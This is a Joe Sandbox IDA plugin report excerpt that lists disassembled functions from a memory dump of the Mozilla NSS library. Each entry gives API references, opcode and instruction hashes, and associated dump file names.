Function 6C7E6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E6E57

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C7E6EAA

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: b709fc53bce3df9bc22ec827df805178f3e8586dea0ca6cf211065e85d002192
Instruction ID: c9db8f4fcfca62db283fe530d222f892be1aa611a29f1e90b01568e1e6e60a5e
Opcode Fuzzy Hash: b709fc53bce3df9bc22ec827df805178f3e8586dea0ca6cf211065e85d002192
Instruction Fuzzy Hash: E431D77361061AEFDB245F34CE04396B7A8BB0931AF14063CDA99D6AC1EB30B654CF81

Function 6C7E2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7E2896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6C7E2932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7E294C
free.MOZGLUE(?), ref: 6C7E2955

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 1b4e49477fbae6622cde4edf172a33b800518d7b1ab0761ade3d260c9bf1a065
Instruction ID: 744b36fb7fb0526e569ee5c0e1585ae93ecbe2896fac65d1b999f79f6baaa0dc
Opcode Fuzzy Hash: 1b4e49477fbae6622cde4edf172a33b800518d7b1ab0761ade3d260c9bf1a065
Instruction Fuzzy Hash: 0521C4B76006029BE7208B2ADE4DF477BE5AF88358F054538E48A87B61FB72E4188751

Function 6C83AAA2 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C8D0D9C,00000000), ref: 6C83AAD4
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C8D0DA8,00000000), ref: 6C83AAE3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _initialize_onexit_table
String ID:
API String ID: 2450287516-0
Opcode ID: d5286827100f50782b9bb331b629b4d8f5c248ab8fa8622cd022dedc4b7ec213
Instruction ID: be69aac7e2905d0066d806a240138201c5875eb2197e7a4ddefff112c3ccc492
Opcode Fuzzy Hash: d5286827100f50782b9bb331b629b4d8f5c248ab8fa8622cd022dedc4b7ec213
Instruction Fuzzy Hash: 5221D676900655ABDF20DFE89B016CE37B69F02318F116926EC18EBA90D771A944CBD1

Function 6C81A8F0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C802AE9,00000000,0000065C), ref: 6C81A91D

Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
Part of subcall function 6C7BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
Part of subcall function 6C7BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
Part of subcall function 6C7BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C802AE9,00000000,0000065C), ref: 6C81A934
SECITEM_ZfreeItem_Util.NSS3(00068C9A,00000000,00000000,00000000,?,?,6C802AE9,00000000,0000065C), ref: 6C81A949
free.MOZGLUE(00068C86,00000000,0000065C), ref: 6C81A952

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: ff36e811cc9c3764abc688973652e3b4c5fb95d158194b58796fb9e8481fe9cc
Instruction ID: 0adede4481014edc1c4a60fdf1fb50067567b962692c4b5856d11e8bf60924dc
Opcode Fuzzy Hash: ff36e811cc9c3764abc688973652e3b4c5fb95d158194b58796fb9e8481fe9cc
Instruction Fuzzy Hash: 5D3159B46052029FD704CF18DA84EA2B7E8FF48318B1585A9E8198BB56E730F944CFA1

Function 6C7B4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C7BB60F,00000000), ref: 6C7B5064

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: a027763d8ca98c54949453760c6290b9feea35459b9f12b7e8d60afa1f9060c2
Instruction ID: 3836a0887d097398c2af0479ce921bf56860480e5b5b09e54b3ef7dd3709ec1e
Opcode Fuzzy Hash: a027763d8ca98c54949453760c6290b9feea35459b9f12b7e8d60afa1f9060c2
Instruction Fuzzy Hash: AE3116B4A056068FDB40EF78D58466ABBF4FF08308B158539E859D7B01E730E990CBD1

Function 6C79ABF0 Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON

Download Yara Rule

APIs

CERT_GetFirstEmailAddress.NSS3(?), ref: 6C79AC0B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C79AC26
PR_Now.NSS3 ref: 6C79AC34
CERT_GetNextEmailAddress.NSS3(?,00000000), ref: 6C79AC6E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: AddressEmail$FirstNextstrcmp
String ID:
API String ID: 3008928262-0
Opcode ID: eeaa69576dfa83cf27a7be13340ab2f58d9351c0da70041d5a8f24790b07ab98
Instruction ID: b5c139a11fc1ead1d70c708f2e12d7ad397ac793f3a272b9918256806f255595
Opcode Fuzzy Hash: eeaa69576dfa83cf27a7be13340ab2f58d9351c0da70041d5a8f24790b07ab98
Instruction Fuzzy Hash: 8C11EC71E026055FAB109F6DAE859AB37D8EF46668B140434FD18CB701FB21D914C6E2

Function 6C7E2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7E2E08

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C7E2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C7E2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7E2E95

Part of subcall function 6C7D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D1228
Part of subcall function 6C7D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7D1238
Part of subcall function 6C7D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D124B
Part of subcall function 6C7D1200: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D125D
Part of subcall function 6C7D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7D126F
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7D1280
Part of subcall function 6C7D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7D128E
Part of subcall function 6C7D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7D129A
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7D12A1

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 0bf9ec8fc506f9899080fb008a908a99e884f076d3db0ec8f05a67056932d27b
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 6F2129B2E003564BE700CF549E4C7AA3768AF9530CF260379DD085B742F7B1E598C292

Function 6C7769B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6C776AB7,0000000C,00000001,00000000,?,?,6C776AB7,?,00000000,?), ref: 6C7769CE

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SEC_ASN1EncodeItem_Util.NSS3(6C776AB7,0000001C,00000004,?,00000001,00000000), ref: 6C776A06
SEC_ASN1EncodeItem_Util.NSS3(6C776AB7,?,00000000,?,00000001,00000000,?,?,6C776AB7,?,00000000,?), ref: 6C776A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6C776AB7,?,00000000,?), ref: 6C776A42

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: 6ec4f8763c11c62ac2c76b3850fad5a60c2d0eb46be003a94eb29f226f99a3b4
Instruction ID: 11bc78490b886c27356ca5d13dd33405db769c9e3327c80b61941fc0f7ea2ffe
Opcode Fuzzy Hash: 6ec4f8763c11c62ac2c76b3850fad5a60c2d0eb46be003a94eb29f226f99a3b4
Instruction Fuzzy Hash: 6811B27164020A6FEF208E69CE84B5677ACFB4075CF128539EA19D3E09E731EA44C7B0

Function 6C79ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C79ACC2

Part of subcall function 6C772F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C772F0A
Part of subcall function 6C772F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C772F1D

Part of subcall function 6C772AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C770A1B,00000000), ref: 6C772AF0
Part of subcall function 6C772AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C772B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C79AD5E

Part of subcall function 6C7B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C77B41E,00000000,00000000,?,00000000,?,6C77B41E,00000000,00000000,00000001,?), ref: 6C7B57E0
Part of subcall function 6C7B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C7B5843

CERT_DestroyCertList.NSS3(?), ref: 6C79AD36

Part of subcall function 6C772F50: CERT_DestroyCertificate.NSS3(?), ref: 6C772F65
Part of subcall function 6C772F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C772F83

free.MOZGLUE(?), ref: 6C79AD4F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 605ca0bbdca37a3856d683c59413c6db717d3d3860936c9cf3ff2c7eb9815d09
Instruction ID: e48584b79881dac24f78b49b7c23b702bbf5b2b29ce69eac56e3585dd4168cf1
Opcode Fuzzy Hash: 605ca0bbdca37a3856d683c59413c6db717d3d3860936c9cf3ff2c7eb9815d09
Instruction Fuzzy Hash: 7421D5B1D012188BEF20DF68EA0A5EEB7B4EF05218F054078D8157B711FB31AA49CBE1

Function 6C7CECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C7CF0AD,6C7CF150,?,6C7CF150,?,?,?), ref: 6C7CECBA

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C7CECD1

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C7CED02

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C7CED5A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 015ef539dd593c02d58a54bd8e6401087966d9ae9e944c36f4bae413ee09b6c5
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: A521D4B1A017425FE700CF25DA49B52B7E4BFA4308F25C225E81C87661E770E594C7D1

Function 6C79C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C79C890

Part of subcall function 6C798F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FAF
Part of subcall function 6C798F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FD1
Part of subcall function 6C798F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C798FFA
Part of subcall function 6C798F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799013
Part of subcall function 6C798F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799042
Part of subcall function 6C798F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C79905A
Part of subcall function 6C798F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C799073
Part of subcall function 6C798F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C78DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C799111

PR_GetCurrentThread.NSS3 ref: 6C79C8B2

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C79C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79C8EB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 317580d0b49332f910547609e89ae4b1c0eff74a2c650d65eaf05b91b66653a6
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 3B01E566E112117BEB0029BA7E89EBF3A699B5526DF040135FC08E7B01F761881983E2

Function 6C88CB30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6C839890: TlsGetValue.KERNEL32(?,?,?,6C8397EB), ref: 6C83989E

EnterCriticalSection.KERNEL32(0000001E,?,?,00000000,?,6C805262,?,?,?,6C7FE333,?,?,6C7FDC77), ref: 6C88CB47
_PR_MD_UNLOCK.NSS3(-0000001A,?,6C805262,?,?,?,6C7FE333,?,?,6C7FDC77), ref: 6C88CB99
_PR_MD_NOTIFYALL_CV.NSS3(?,?,?,6C805262,?,?,?,6C7FE333,?,?,6C7FDC77), ref: 6C88CBC3
_PR_MD_NOTIFY_CV.NSS3(?,?,?,6C805262,?,?,?,6C7FE333,?,?,6C7FDC77), ref: 6C88CBD2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionValue
String ID:
API String ID: 2782078792-0
Opcode ID: 474cc843c81c44d1969df5da117abc997eee59a8e1c5568adc2e5fb5002f6633
Instruction ID: d88a1335b9ccbfe6fc6190b6985be4c5645be7e59849f76386fde95644c9ff77
Opcode Fuzzy Hash: 474cc843c81c44d1969df5da117abc997eee59a8e1c5568adc2e5fb5002f6633
Instruction Fuzzy Hash: FE11A271A12A25BBD330AF66CA40A45B3A4FF0076DF148B39D81897F06E731A995CBD1

Function 6C7C4900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

